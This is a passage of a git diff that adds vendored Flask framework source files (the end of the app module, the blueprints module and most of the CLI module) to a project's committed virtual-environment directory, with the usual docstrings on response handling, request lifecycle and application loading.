must return a response. Returning ``None``, or the view ending + without returning, is not allowed. The following types are allowed + for ``view_rv``: + + ``str`` + A response object is created with the string encoded to UTF-8 + as the body. + + ``bytes`` + A response object is created with the bytes as the body. + + ``dict`` + A dictionary that will be jsonify'd before being returned. + + ``list`` + A list that will be jsonify'd before being returned. + + ``generator`` or ``iterator`` + A generator that returns ``str`` or ``bytes`` to be + streamed as the response. + + ``tuple`` + Either ``(body, status, headers)``, ``(body, status)``, or + ``(body, headers)``, where ``body`` is any of the other types + allowed here, ``status`` is a string or an integer, and + ``headers`` is a dictionary or a list of ``(key, value)`` + tuples. If ``body`` is a :attr:`response_class` instance, + ``status`` overwrites the exiting value and ``headers`` are + extended. + + :attr:`response_class` + The object is returned unchanged. + + other :class:`~werkzeug.wrappers.Response` class + The object is coerced to :attr:`response_class`. + + :func:`callable` + The function is called as a WSGI application. The result is + used to create a response object. + + .. versionchanged:: 2.2 + A generator will be converted to a streaming response. + A list will be converted to a JSON response. + + .. versionchanged:: 1.1 + A dict will be converted to a JSON response. + + .. versionchanged:: 0.9 + Previously a tuple was interpreted as the arguments for the + response object. + """ + + status = headers = None + + # unpack tuple returns + if isinstance(rv, tuple): + len_rv = len(rv) + + # a 3-tuple is unpacked directly + if len_rv == 3: + rv, status, headers = rv # type: ignore[misc] + # decide if a 2-tuple has status or headers + elif len_rv == 2: + if isinstance(rv[1], (Headers, dict, tuple, list)): + rv, headers = rv + else: + rv, status = rv # type: ignore[assignment,misc] + # other sized tuples are not allowed + else: + raise TypeError( + "The view function did not return a valid response tuple." + " The tuple must have the form (body, status, headers)," + " (body, status), or (body, headers)." + ) + + # the body must not be None + if rv is None: + raise TypeError( + f"The view function for {request.endpoint!r} did not" + " return a valid response. The function either returned" + " None or ended without a return statement." + ) + + # make sure the body is an instance of the response class + if not isinstance(rv, self.response_class): + if isinstance(rv, (str, bytes, bytearray)) or isinstance(rv, _abc_Iterator): + # let the response class set the status and headers instead of + # waiting to do it manually, so that the class can handle any + # special logic + rv = self.response_class( + rv, + status=status, + headers=headers, # type: ignore[arg-type] + ) + status = headers = None + elif isinstance(rv, (dict, list)): + rv = self.json.response(rv) + elif isinstance(rv, BaseResponse) or callable(rv): + # evaluate a WSGI callable, or coerce a different response + # class to the correct type + try: + rv = self.response_class.force_type( + rv, request.environ # type: ignore[arg-type] + ) + except TypeError as e: + raise TypeError( + f"{e}\nThe view function did not return a valid" + " response. The return type must be a string," + " dict, list, tuple with headers or status," + " Response instance, or WSGI callable, but it" + f" was a {type(rv).__name__}." + ).with_traceback(sys.exc_info()[2]) from None + else: + raise TypeError( + "The view function did not return a valid" + " response. The return type must be a string," + " dict, list, tuple with headers or status," + " Response instance, or WSGI callable, but it was a" + f" {type(rv).__name__}." + ) + + rv = t.cast(Response, rv) + # prefer the status if it was provided + if status is not None: + if isinstance(status, (str, bytes, bytearray)): + rv.status = status + else: + rv.status_code = status + + # extend existing headers with provided headers + if headers: + rv.headers.update(headers) # type: ignore[arg-type] + + return rv + + def preprocess_request(self) -> ft.ResponseReturnValue | None: + """Called before the request is dispatched. Calls + :attr:`url_value_preprocessors` registered with the app and the + current blueprint (if any). Then calls :attr:`before_request_funcs` + registered with the app and the blueprint. + + If any :meth:`before_request` handler returns a non-None value, the + value is handled as if it was the return value from the view, and + further request handling is stopped. + """ + names = (None, *reversed(request.blueprints)) + + for name in names: + if name in self.url_value_preprocessors: + for url_func in self.url_value_preprocessors[name]: + url_func(request.endpoint, request.view_args) + + for name in names: + if name in self.before_request_funcs: + for before_func in self.before_request_funcs[name]: + rv = self.ensure_sync(before_func)() + + if rv is not None: + return rv + + return None + + def process_response(self, response: Response) -> Response: + """Can be overridden in order to modify the response object + before it's sent to the WSGI server. By default this will + call all the :meth:`after_request` decorated functions. + + .. versionchanged:: 0.5 + As of Flask 0.5 the functions registered for after request + execution are called in reverse order of registration. + + :param response: a :attr:`response_class` object. + :return: a new response object or the same, has to be an + instance of :attr:`response_class`. + """ + ctx = request_ctx._get_current_object() # type: ignore[attr-defined] + + for func in ctx._after_request_functions: + response = self.ensure_sync(func)(response) + + for name in chain(request.blueprints, (None,)): + if name in self.after_request_funcs: + for func in reversed(self.after_request_funcs[name]): + response = self.ensure_sync(func)(response) + + if not self.session_interface.is_null_session(ctx.session): + self.session_interface.save_session(self, ctx.session, response) + + return response + + def do_teardown_request( + self, exc: BaseException | None = _sentinel # type: ignore + ) -> None: + """Called after the request is dispatched and the response is + returned, right before the request context is popped. + + This calls all functions decorated with + :meth:`teardown_request`, and :meth:`Blueprint.teardown_request` + if a blueprint handled the request. Finally, the + :data:`request_tearing_down` signal is sent. + + This is called by + :meth:`RequestContext.pop() `, + which may be delayed during testing to maintain access to + resources. + + :param exc: An unhandled exception raised while dispatching the + request. Detected from the current exception information if + not passed. Passed to each teardown function. + + .. versionchanged:: 0.9 + Added the ``exc`` argument. + """ + if exc is _sentinel: + exc = sys.exc_info()[1] + + for name in chain(request.blueprints, (None,)): + if name in self.teardown_request_funcs: + for func in reversed(self.teardown_request_funcs[name]): + self.ensure_sync(func)(exc) + + request_tearing_down.send(self, _async_wrapper=self.ensure_sync, exc=exc) + + def do_teardown_appcontext( + self, exc: BaseException | None = _sentinel # type: ignore + ) -> None: + """Called right before the application context is popped. + + When handling a request, the application context is popped + after the request context. See :meth:`do_teardown_request`. + + This calls all functions decorated with + :meth:`teardown_appcontext`. Then the + :data:`appcontext_tearing_down` signal is sent. + + This is called by + :meth:`AppContext.pop() `. + + .. versionadded:: 0.9 + """ + if exc is _sentinel: + exc = sys.exc_info()[1] + + for func in reversed(self.teardown_appcontext_funcs): + self.ensure_sync(func)(exc) + + appcontext_tearing_down.send(self, _async_wrapper=self.ensure_sync, exc=exc) + + def app_context(self) -> AppContext: + """Create an :class:`~flask.ctx.AppContext`. Use as a ``with`` + block to push the context, which will make :data:`current_app` + point at this application. + + An application context is automatically pushed by + :meth:`RequestContext.push() ` + when handling a request, and when running a CLI command. Use + this to manually create a context outside of these situations. + + :: + + with app.app_context(): + init_db() + + See :doc:`/appcontext`. + + .. versionadded:: 0.9 + """ + return AppContext(self) + + def request_context(self, environ: dict) -> RequestContext: + """Create a :class:`~flask.ctx.RequestContext` representing a + WSGI environment. Use a ``with`` block to push the context, + which will make :data:`request` point at this request. + + See :doc:`/reqcontext`. + + Typically you should not call this from your own code. A request + context is automatically pushed by the :meth:`wsgi_app` when + handling a request. Use :meth:`test_request_context` to create + an environment and context instead of this method. + + :param environ: a WSGI environment + """ + return RequestContext(self, environ) + + def test_request_context(self, *args: t.Any, **kwargs: t.Any) -> RequestContext: + """Create a :class:`~flask.ctx.RequestContext` for a WSGI + environment created from the given values. This is mostly useful + during testing, where you may want to run a function that uses + request data without dispatching a full request. + + See :doc:`/reqcontext`. + + Use a ``with`` block to push the context, which will make + :data:`request` point at the request for the created + environment. :: + + with app.test_request_context(...): + generate_report() + + When using the shell, it may be easier to push and pop the + context manually to avoid indentation. :: + + ctx = app.test_request_context(...) + ctx.push() + ... + ctx.pop() + + Takes the same arguments as Werkzeug's + :class:`~werkzeug.test.EnvironBuilder`, with some defaults from + the application. See the linked Werkzeug docs for most of the + available arguments. Flask-specific behavior is listed here. + + :param path: URL path being requested. + :param base_url: Base URL where the app is being served, which + ``path`` is relative to. If not given, built from + :data:`PREFERRED_URL_SCHEME`, ``subdomain``, + :data:`SERVER_NAME`, and :data:`APPLICATION_ROOT`. + :param subdomain: Subdomain name to append to + :data:`SERVER_NAME`. + :param url_scheme: Scheme to use instead of + :data:`PREFERRED_URL_SCHEME`. + :param data: The request body, either as a string or a dict of + form keys and values. + :param json: If given, this is serialized as JSON and passed as + ``data``. Also defaults ``content_type`` to + ``application/json``. + :param args: other positional arguments passed to + :class:`~werkzeug.test.EnvironBuilder`. + :param kwargs: other keyword arguments passed to + :class:`~werkzeug.test.EnvironBuilder`. + """ + from .testing import EnvironBuilder + + builder = EnvironBuilder(self, *args, **kwargs) + + try: + return self.request_context(builder.get_environ()) + finally: + builder.close() + + def wsgi_app(self, environ: dict, start_response: t.Callable) -> t.Any: + """The actual WSGI application. This is not implemented in + :meth:`__call__` so that middlewares can be applied without + losing a reference to the app object. Instead of doing this:: + + app = MyMiddleware(app) + + It's a better idea to do this instead:: + + app.wsgi_app = MyMiddleware(app.wsgi_app) + + Then you still have the original application object around and + can continue to call methods on it. + + .. versionchanged:: 0.7 + Teardown events for the request and app contexts are called + even if an unhandled error occurs. Other events may not be + called depending on when an error occurs during dispatch. + See :ref:`callbacks-and-errors`. + + :param environ: A WSGI environment. + :param start_response: A callable accepting a status code, + a list of headers, and an optional exception context to + start the response. + """ + ctx = self.request_context(environ) + error: BaseException | None = None + try: + try: + ctx.push() + response = self.full_dispatch_request() + except Exception as e: + error = e + response = self.handle_exception(e) + except: # noqa: B001 + error = sys.exc_info()[1] + raise + return response(environ, start_response) + finally: + if "werkzeug.debug.preserve_context" in environ: + environ["werkzeug.debug.preserve_context"](_cv_app.get()) + environ["werkzeug.debug.preserve_context"](_cv_request.get()) + + if error is not None and self.should_ignore_error(error): + error = None + + ctx.pop(error) + + def __call__(self, environ: dict, start_response: t.Callable) -> t.Any: + """The WSGI server calls the Flask application object as the + WSGI application. This calls :meth:`wsgi_app`, which can be + wrapped to apply middleware. + """ + return self.wsgi_app(environ, start_response) diff --git a/env/Lib/site-packages/flask/blueprints.py b/env/Lib/site-packages/flask/blueprints.py new file mode 100644 index 00000000..3a37a2c4 --- /dev/null +++ b/env/Lib/site-packages/flask/blueprints.py @@ -0,0 +1,91 @@ +from __future__ import annotations + +import os +import typing as t +from datetime import timedelta + +from .globals import current_app +from .helpers import send_from_directory +from .sansio.blueprints import Blueprint as SansioBlueprint +from .sansio.blueprints import BlueprintSetupState as BlueprintSetupState # noqa + +if t.TYPE_CHECKING: # pragma: no cover + from .wrappers import Response + + +class Blueprint(SansioBlueprint): + def get_send_file_max_age(self, filename: str | None) -> int | None: + """Used by :func:`send_file` to determine the ``max_age`` cache + value for a given file path if it wasn't passed. + + By default, this returns :data:`SEND_FILE_MAX_AGE_DEFAULT` from + the configuration of :data:`~flask.current_app`. This defaults + to ``None``, which tells the browser to use conditional requests + instead of a timed cache, which is usually preferable. + + Note this is a duplicate of the same method in the Flask + class. + + .. versionchanged:: 2.0 + The default configuration is ``None`` instead of 12 hours. + + .. versionadded:: 0.9 + """ + value = current_app.config["SEND_FILE_MAX_AGE_DEFAULT"] + + if value is None: + return None + + if isinstance(value, timedelta): + return int(value.total_seconds()) + + return value + + def send_static_file(self, filename: str) -> Response: + """The view function used to serve files from + :attr:`static_folder`. A route is automatically registered for + this view at :attr:`static_url_path` if :attr:`static_folder` is + set. + + Note this is a duplicate of the same method in the Flask + class. + + .. versionadded:: 0.5 + + """ + if not self.has_static_folder: + raise RuntimeError("'static_folder' must be set to serve static_files.") + + # send_file only knows to call get_send_file_max_age on the app, + # call it here so it works for blueprints too. + max_age = self.get_send_file_max_age(filename) + return send_from_directory( + t.cast(str, self.static_folder), filename, max_age=max_age + ) + + def open_resource(self, resource: str, mode: str = "rb") -> t.IO[t.AnyStr]: + """Open a resource file relative to :attr:`root_path` for + reading. + + For example, if the file ``schema.sql`` is next to the file + ``app.py`` where the ``Flask`` app is defined, it can be opened + with: + + .. code-block:: python + + with app.open_resource("schema.sql") as f: + conn.executescript(f.read()) + + :param resource: Path to the resource relative to + :attr:`root_path`. + :param mode: Open the file in this mode. Only reading is + supported, valid values are "r" (or "rt") and "rb". + + Note this is a duplicate of the same method in the Flask + class. + + """ + if mode not in {"r", "rt", "rb"}: + raise ValueError("Resources can only be opened for reading.") + + return open(os.path.join(self.root_path, resource), mode) diff --git a/env/Lib/site-packages/flask/cli.py b/env/Lib/site-packages/flask/cli.py new file mode 100644 index 00000000..dda266b3 --- /dev/null +++ b/env/Lib/site-packages/flask/cli.py @@ -0,0 +1,1068 @@ +from __future__ import annotations + +import ast +import importlib.metadata +import inspect +import os +import platform +import re +import sys +import traceback +import typing as t +from functools import update_wrapper +from operator import itemgetter + +import click +from click.core import ParameterSource +from werkzeug import run_simple +from werkzeug.serving import is_running_from_reloader +from werkzeug.utils import import_string + +from .globals import current_app +from .helpers import get_debug_flag +from .helpers import get_load_dotenv + +if t.TYPE_CHECKING: + from .app import Flask + + +class NoAppException(click.UsageError): + """Raised if an application cannot be found or loaded.""" + + +def find_best_app(module): + """Given a module instance this tries to find the best possible + application in the module or raises an exception. + """ + from . import Flask + + # Search for the most common names first. + for attr_name in ("app", "application"): + app = getattr(module, attr_name, None) + + if isinstance(app, Flask): + return app + + # Otherwise find the only object that is a Flask instance. + matches = [v for v in module.__dict__.values() if isinstance(v, Flask)] + + if len(matches) == 1: + return matches[0] + elif len(matches) > 1: + raise NoAppException( + "Detected multiple Flask applications in module" + f" '{module.__name__}'. Use '{module.__name__}:name'" + " to specify the correct one." + ) + + # Search for app factory functions. + for attr_name in ("create_app", "make_app"): + app_factory = getattr(module, attr_name, None) + + if inspect.isfunction(app_factory): + try: + app = app_factory() + + if isinstance(app, Flask): + return app + except TypeError as e: + if not _called_with_wrong_args(app_factory): + raise + + raise NoAppException( + f"Detected factory '{attr_name}' in module '{module.__name__}'," + " but could not call it without arguments. Use" + f" '{module.__name__}:{attr_name}(args)'" + " to specify arguments." + ) from e + + raise NoAppException( + "Failed to find Flask application or factory in module" + f" '{module.__name__}'. Use '{module.__name__}:name'" + " to specify one." + ) + + +def _called_with_wrong_args(f): + """Check whether calling a function raised a ``TypeError`` because + the call failed or because something in the factory raised the + error. + + :param f: The function that was called. + :return: ``True`` if the call failed. + """ + tb = sys.exc_info()[2] + + try: + while tb is not None: + if tb.tb_frame.f_code is f.__code__: + # In the function, it was called successfully. + return False + + tb = tb.tb_next + + # Didn't reach the function. + return True + finally: + # Delete tb to break a circular reference. + # https://docs.python.org/2/library/sys.html#sys.exc_info + del tb + + +def find_app_by_string(module, app_name): + """Check if the given string is a variable name or a function. Call + a function to get the app instance, or return the variable directly. + """ + from . import Flask + + # Parse app_name as a single expression to determine if it's a valid + # attribute name or function call. + try: + expr = ast.parse(app_name.strip(), mode="eval").body + except SyntaxError: + raise NoAppException( + f"Failed to parse {app_name!r} as an attribute name or function call." + ) from None + + if isinstance(expr, ast.Name): + name = expr.id + args = [] + kwargs = {} + elif isinstance(expr, ast.Call): + # Ensure the function name is an attribute name only. + if not isinstance(expr.func, ast.Name): + raise NoAppException( + f"Function reference must be a simple name: {app_name!r}." + ) + + name = expr.func.id + + # Parse the positional and keyword arguments as literals. + try: + args = [ast.literal_eval(arg) for arg in expr.args] + kwargs = {kw.arg: ast.literal_eval(kw.value) for kw in expr.keywords} + except ValueError: + # literal_eval gives cryptic error messages, show a generic + # message with the full expression instead. + raise NoAppException( + f"Failed to parse arguments as literal values: {app_name!r}." + ) from None + else: + raise NoAppException( + f"Failed to parse {app_name!r} as an attribute name or function call." + ) + + try: + attr = getattr(module, name) + except AttributeError as e: + raise NoAppException( + f"Failed to find attribute {name!r} in {module.__name__!r}." + ) from e + + # If the attribute is a function, call it with any args and kwargs + # to get the real application. + if inspect.isfunction(attr): + try: + app = attr(*args, **kwargs) + except TypeError as e: + if not _called_with_wrong_args(attr): + raise + + raise NoAppException( + f"The factory {app_name!r} in module" + f" {module.__name__!r} could not be called with the" + " specified arguments." + ) from e + else: + app = attr + + if isinstance(app, Flask): + return app + + raise NoAppException( + "A valid Flask application was not obtained from" + f" '{module.__name__}:{app_name}'." + ) + + +def prepare_import(path): + """Given a filename this will try to calculate the python path, add it + to the search path and return the actual module name that is expected. + """ + path = os.path.realpath(path) + + fname, ext = os.path.splitext(path) + if ext == ".py": + path = fname + + if os.path.basename(path) == "__init__": + path = os.path.dirname(path) + + module_name = [] + + # move up until outside package structure (no __init__.py) + while True: + path, name = os.path.split(path) + module_name.append(name) + + if not os.path.exists(os.path.join(path, "__init__.py")): + break + + if sys.path[0] != path: + sys.path.insert(0, path) + + return ".".join(module_name[::-1]) + + +def locate_app(module_name, app_name, raise_if_not_found=True): + try: + __import__(module_name) + except ImportError: + # Reraise the ImportError if it occurred within the imported module. + # Determine this by checking whether the trace has a depth > 1. + if sys.exc_info()[2].tb_next: + raise NoAppException( + f"While importing {module_name!r}, an ImportError was" + f" raised:\n\n{traceback.format_exc()}" + ) from None + elif raise_if_not_found: + raise NoAppException(f"Could not import {module_name!r}.") from None + else: + return + + module = sys.modules[module_name] + + if app_name is None: + return find_best_app(module) + else: + return find_app_by_string(module, app_name) + + +def get_version(ctx, param, value): + if not value or ctx.resilient_parsing: + return + + flask_version = importlib.metadata.version("flask") + werkzeug_version = importlib.metadata.version("werkzeug") + + click.echo( + f"Python {platform.python_version()}\n" + f"Flask {flask_version}\n" + f"Werkzeug {werkzeug_version}", + color=ctx.color, + ) + ctx.exit() + + +version_option = click.Option( + ["--version"], + help="Show the Flask version.", + expose_value=False, + callback=get_version, + is_flag=True, + is_eager=True, +) + + +class ScriptInfo: + """Helper object to deal with Flask applications. This is usually not + necessary to interface with as it's used internally in the dispatching + to click. In future versions of Flask this object will most likely play + a bigger role. Typically it's created automatically by the + :class:`FlaskGroup` but you can also manually create it and pass it + onwards as click object. + """ + + def __init__( + self, + app_import_path: str | None = None, + create_app: t.Callable[..., Flask] | None = None, + set_debug_flag: bool = True, + ) -> None: + #: Optionally the import path for the Flask application. + self.app_import_path = app_import_path + #: Optionally a function that is passed the script info to create + #: the instance of the application. + self.create_app = create_app + #: A dictionary with arbitrary data that can be associated with + #: this script info. + self.data: dict[t.Any, t.Any] = {} + self.set_debug_flag = set_debug_flag + self._loaded_app: Flask | None = None + + def load_app(self) -> Flask: + """Loads the Flask app (if not yet loaded) and returns it. Calling + this multiple times will just result in the already loaded app to + be returned. + """ + if self._loaded_app is not None: + return self._loaded_app + + if self.create_app is not None: + app = self.create_app() + else: + if self.app_import_path: + path, name = ( + re.split(r":(?![\\/])", self.app_import_path, maxsplit=1) + [None] + )[:2] + import_name = prepare_import(path) + app = locate_app(import_name, name) + else: + for path in ("wsgi.py", "app.py"): + import_name = prepare_import(path) + app = locate_app(import_name, None, raise_if_not_found=False) + + if app: + break + + if not app: + raise NoAppException( + "Could not locate a Flask application. Use the" + " 'flask --app' option, 'FLASK_APP' environment" + " variable, or a 'wsgi.py' or 'app.py' file in the" + " current directory." + ) + + if self.set_debug_flag: + # Update the app's debug flag through the descriptor so that + # other values repopulate as well. + app.debug = get_debug_flag() + + self._loaded_app = app + return app + + +pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True) + + +def with_appcontext(f): + """Wraps a callback so that it's guaranteed to be executed with the + script's application context. + + Custom commands (and their options) registered under ``app.cli`` or + ``blueprint.cli`` will always have an app context available, this + decorator is not required in that case. + + .. versionchanged:: 2.2 + The app context is active for subcommands as well as the + decorated callback. The app context is always available to + ``app.cli`` command and parameter callbacks. + """ + + @click.pass_context + def decorator(__ctx, *args, **kwargs): + if not current_app: + app = __ctx.ensure_object(ScriptInfo).load_app() + __ctx.with_resource(app.app_context()) + + return __ctx.invoke(f, *args, **kwargs) + + return update_wrapper(decorator, f) + + +class AppGroup(click.Group): + """This works similar to a regular click :class:`~click.Group` but it + changes the behavior of the :meth:`command` decorator so that it + automatically wraps the functions in :func:`with_appcontext`. + + Not to be confused with :class:`FlaskGroup`. + """ + + def command(self, *args, **kwargs): + """This works exactly like the method of the same name on a regular + :class:`click.Group` but it wraps callbacks in :func:`with_appcontext` + unless it's disabled by passing ``with_appcontext=False``. + """ + wrap_for_ctx = kwargs.pop("with_appcontext", True) + + def decorator(f): + if wrap_for_ctx: + f = with_appcontext(f) + return click.Group.command(self, *args, **kwargs)(f) + + return decorator + + def group(self, *args, **kwargs): + """This works exactly like the method of the same name on a regular + :class:`click.Group` but it defaults the group class to + :class:`AppGroup`. + """ + kwargs.setdefault("cls", AppGroup) + return click.Group.group(self, *args, **kwargs) + + +def _set_app(ctx: click.Context, param: click.Option, value: str | None) -> str | None: + if value is None: + return None + + info = ctx.ensure_object(ScriptInfo) + info.app_import_path = value + return value + + +# This option is eager so the app will be available if --help is given. +# --help is also eager, so --app must be before it in the param list. +# no_args_is_help bypasses eager processing, so this option must be +# processed manually in that case to ensure FLASK_APP gets picked up. +_app_option = click.Option( + ["-A", "--app"], + metavar="IMPORT", + help=( + "The Flask application or factory function to load, in the form 'module:name'." + " Module can be a dotted import or file path. Name is not required if it is" + " 'app', 'application', 'create_app', or 'make_app', and can be 'name(args)' to" + " pass arguments." + ), + is_eager=True, + expose_value=False, + callback=_set_app, +) + + +def _set_debug(ctx: click.Context, param: click.Option, value: bool) -> bool | None: + # If the flag isn't provided, it will default to False. Don't use + # that, let debug be set by env in that case. + source = ctx.get_parameter_source(param.name) # type: ignore[arg-type] + + if source is not None and source in ( + ParameterSource.DEFAULT, + ParameterSource.DEFAULT_MAP, + ): + return None + + # Set with env var instead of ScriptInfo.load so that it can be + # accessed early during a factory function. + os.environ["FLASK_DEBUG"] = "1" if value else "0" + return value + + +_debug_option = click.Option( + ["--debug/--no-debug"], + help="Set debug mode.", + expose_value=False, + callback=_set_debug, +) + + +def _env_file_callback( + ctx: click.Context, param: click.Option, value: str | None +) -> str | None: + if value is None: + return None + + import importlib + + try: + importlib.import_module("dotenv") + except ImportError: + raise click.BadParameter( + "python-dotenv must be installed to load an env file.", + ctx=ctx, + param=param, + ) from None + + # Don't check FLASK_SKIP_DOTENV, that only disables automatically + # loading .env and .flaskenv files. + load_dotenv(value) + return value + + +# This option is eager so env vars are loaded as early as possible to be +# used by other options. +_env_file_option = click.Option( + ["-e", "--env-file"], + type=click.Path(exists=True, dir_okay=False), + help="Load environment variables from this file. python-dotenv must be installed.", + is_eager=True, + expose_value=False, + callback=_env_file_callback, +) + + +class FlaskGroup(AppGroup): + """Special subclass of the :class:`AppGroup` group that supports + loading more commands from the configured Flask app. Normally a + developer does not have to interface with this class but there are + some very advanced use cases for which it makes sense to create an + instance of this. see :ref:`custom-scripts`. + + :param add_default_commands: if this is True then the default run and + shell commands will be added. + :param add_version_option: adds the ``--version`` option. + :param create_app: an optional callback that is passed the script info and + returns the loaded app. + :param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv` + files to set environment variables. Will also change the working + directory to the directory containing the first file found. + :param set_debug_flag: Set the app's debug flag. + + .. versionchanged:: 2.2 + Added the ``-A/--app``, ``--debug/--no-debug``, ``-e/--env-file`` options. + + .. versionchanged:: 2.2 + An app context is pushed when running ``app.cli`` commands, so + ``@with_appcontext`` is no longer required for those commands. + + .. versionchanged:: 1.0 + If installed, python-dotenv will be used to load environment variables + from :file:`.env` and :file:`.flaskenv` files. + """ + + def __init__( + self, + add_default_commands: bool = True, + create_app: t.Callable[..., Flask] | None = None, + add_version_option: bool = True, + load_dotenv: bool = True, + set_debug_flag: bool = True, + **extra: t.Any, + ) -> None: + params = list(extra.pop("params", None) or ()) + # Processing is done with option callbacks instead of a group + # callback. This allows users to make a custom group callback + # without losing the behavior. --env-file must come first so + # that it is eagerly evaluated before --app. + params.extend((_env_file_option, _app_option, _debug_option)) + + if add_version_option: + params.append(version_option) + + if "context_settings" not in extra: + extra["context_settings"] = {} + + extra["context_settings"].setdefault("auto_envvar_prefix", "FLASK") + + super().__init__(params=params, **extra) + + self.create_app = create_app + self.load_dotenv = load_dotenv + self.set_debug_flag = set_debug_flag + + if add_default_commands: + self.add_command(run_command) + self.add_command(shell_command) + self.add_command(routes_command) + + self._loaded_plugin_commands = False + + def _load_plugin_commands(self): + if self._loaded_plugin_commands: + return + + if sys.version_info >= (3, 10): + from importlib import metadata + else: + # Use a backport on Python < 3.10. We technically have + # importlib.metadata on 3.8+, but the API changed in 3.10, + # so use the backport for consistency. + import importlib_metadata as metadata + + for ep in metadata.entry_points(group="flask.commands"): + self.add_command(ep.load(), ep.name) + + self._loaded_plugin_commands = True + + def get_command(self, ctx, name): + self._load_plugin_commands() + # Look up built-in and plugin commands, which should be + # available even if the app fails to load. + rv = super().get_command(ctx, name) + + if rv is not None: + return rv + + info = ctx.ensure_object(ScriptInfo) + + # Look up commands provided by the app, showing an error and + # continuing if the app couldn't be loaded. + try: + app = info.load_app() + except NoAppException as e: + click.secho(f"Error: {e.format_message()}\n", err=True, fg="red") + return None + + # Push an app context for the loaded app unless it is already + # active somehow. This makes the context available to parameter + # and command callbacks without needing @with_appcontext. + if not current_app or current_app._get_current_object() is not app: + ctx.with_resource(app.app_context()) + + return app.cli.get_command(ctx, name) + + def list_commands(self, ctx): + self._load_plugin_commands() + # Start with the built-in and plugin commands. + rv = set(super().list_commands(ctx)) + info = ctx.ensure_object(ScriptInfo) + + # Add commands provided by the app, showing an error and + # continuing if the app couldn't be loaded. + try: + rv.update(info.load_app().cli.list_commands(ctx)) + except NoAppException as e: + # When an app couldn't be loaded, show the error message + # without the traceback. + click.secho(f"Error: {e.format_message()}\n", err=True, fg="red") + except Exception: + # When any other errors occurred during loading, show the + # full traceback. + click.secho(f"{traceback.format_exc()}\n", err=True, fg="red") + + return sorted(rv) + + def make_context( + self, + info_name: str | None, + args: list[str], + parent: click.Context | None = None, + **extra: t.Any, + ) -> click.Context: + # Set a flag to tell app.run to become a no-op. If app.run was + # not in a __name__ == __main__ guard, it would start the server + # when importing, blocking whatever command is being called. + os.environ["FLASK_RUN_FROM_CLI"] = "true" + + # Attempt to load .env and .flask env files. The --env-file + # option can cause another file to be loaded. + if get_load_dotenv(self.load_dotenv): + load_dotenv() + + if "obj" not in extra and "obj" not in self.context_settings: + extra["obj"] = ScriptInfo( + create_app=self.create_app, set_debug_flag=self.set_debug_flag + ) + + return super().make_context(info_name, args, parent=parent, **extra) + + def parse_args(self, ctx: click.Context, args: list[str]) -> list[str]: + if not args and self.no_args_is_help: + # Attempt to load --env-file and --app early in case they + # were given as env vars. Otherwise no_args_is_help will not + # see commands from app.cli. + _env_file_option.handle_parse_result(ctx, {}, []) + _app_option.handle_parse_result(ctx, {}, []) + + return super().parse_args(ctx, args) + + +def _path_is_ancestor(path, other): + """Take ``other`` and remove the length of ``path`` from it. Then join it + to ``path``. If it is the original value, ``path`` is an ancestor of + ``other``.""" + return os.path.join(path, other[len(path) :].lstrip(os.sep)) == other + + +def load_dotenv(path: str | os.PathLike | None = None) -> bool: + """Load "dotenv" files in order of precedence to set environment variables. + + If an env var is already set it is not overwritten, so earlier files in the + list are preferred over later files. + + This is a no-op if `python-dotenv`_ is not installed. + + .. _python-dotenv: https://github.com/theskumar/python-dotenv#readme + + :param path: Load the file at this location instead of searching. + :return: ``True`` if a file was loaded. + + .. versionchanged:: 2.0 + The current directory is not changed to the location of the + loaded file. + + .. versionchanged:: 2.0 + When loading the env files, set the default encoding to UTF-8. + + .. versionchanged:: 1.1.0 + Returns ``False`` when python-dotenv is not installed, or when + the given path isn't a file. + + .. versionadded:: 1.0 + """ + try: + import dotenv + except ImportError: + if path or os.path.isfile(".env") or os.path.isfile(".flaskenv"): + click.secho( + " * Tip: There are .env or .flaskenv files present." + ' Do "pip install python-dotenv" to use them.', + fg="yellow", + err=True, + ) + + return False + + # Always return after attempting to load a given path, don't load + # the default files. + if path is not None: + if os.path.isfile(path): + return dotenv.load_dotenv(path, encoding="utf-8") + + return False + + loaded = False + + for name in (".env", ".flaskenv"): + path = dotenv.find_dotenv(name, usecwd=True) + + if not path: + continue + + dotenv.load_dotenv(path, encoding="utf-8") + loaded = True + + return loaded # True if at least one file was located and loaded. + + +def show_server_banner(debug, app_import_path): + """Show extra startup messages the first time the server is run, + ignoring the reloader. + """ + if is_running_from_reloader(): + return + + if app_import_path is not None: + click.echo(f" * Serving Flask app '{app_import_path}'") + + if debug is not None: + click.echo(f" * Debug mode: {'on' if debug else 'off'}") + + +class CertParamType(click.ParamType): + """Click option type for the ``--cert`` option. Allows either an + existing file, the string ``'adhoc'``, or an import for a + :class:`~ssl.SSLContext` object. + """ + + name = "path" + + def __init__(self): + self.path_type = click.Path(exists=True, dir_okay=False, resolve_path=True) + + def convert(self, value, param, ctx): + try: + import ssl + except ImportError: + raise click.BadParameter( + 'Using "--cert" requires Python to be compiled with SSL support.', + ctx, + param, + ) from None + + try: + return self.path_type(value, param, ctx) + except click.BadParameter: + value = click.STRING(value, param, ctx).lower() + + if value == "adhoc": + try: + import cryptography # noqa: F401 + except ImportError: + raise click.BadParameter( + "Using ad-hoc certificates requires the cryptography library.", + ctx, + param, + ) from None + + return value + + obj = import_string(value, silent=True) + + if isinstance(obj, ssl.SSLContext): + return obj + + raise + + +def _validate_key(ctx, param, value): + """The ``--key`` option must be specified when ``--cert`` is a file. + Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed. + """ + cert = ctx.params.get("cert") + is_adhoc = cert == "adhoc" + + try: + import ssl + except ImportError: + is_context = False + else: + is_context = isinstance(cert, ssl.SSLContext) + + if value is not None: + if is_adhoc: + raise click.BadParameter( + 'When "--cert" is "adhoc", "--key" is not used.', ctx, param + ) + + if is_context: + raise click.BadParameter( + 'When "--cert" is an SSLContext object, "--key is not used.', ctx, param + ) + + if not cert: + raise click.BadParameter('"--cert" must also be specified.', ctx, param) + + ctx.params["cert"] = cert, value + + else: + if cert and not (is_adhoc or is_context): + raise click.BadParameter('Required when using "--cert".', ctx, param) + + return value + + +class SeparatedPathType(click.Path): + """Click option type that accepts a list of values separated by the + OS's path separator (``:``, ``;`` on Windows). Each value is + validated as a :class:`click.Path` type. + """ + + def convert(self, value, param, ctx): + items = self.split_envvar_value(value) + super_convert = super().convert + return [super_convert(item, param, ctx) for item in items] + + +@click.command("run", short_help="Run a development server.") +@click.option("--host", "-h", default="127.0.0.1", help="The interface to bind to.") +@click.option("--port", "-p", default=5000, help="The port to bind to.") +@click.option( + "--cert", + type=CertParamType(), + 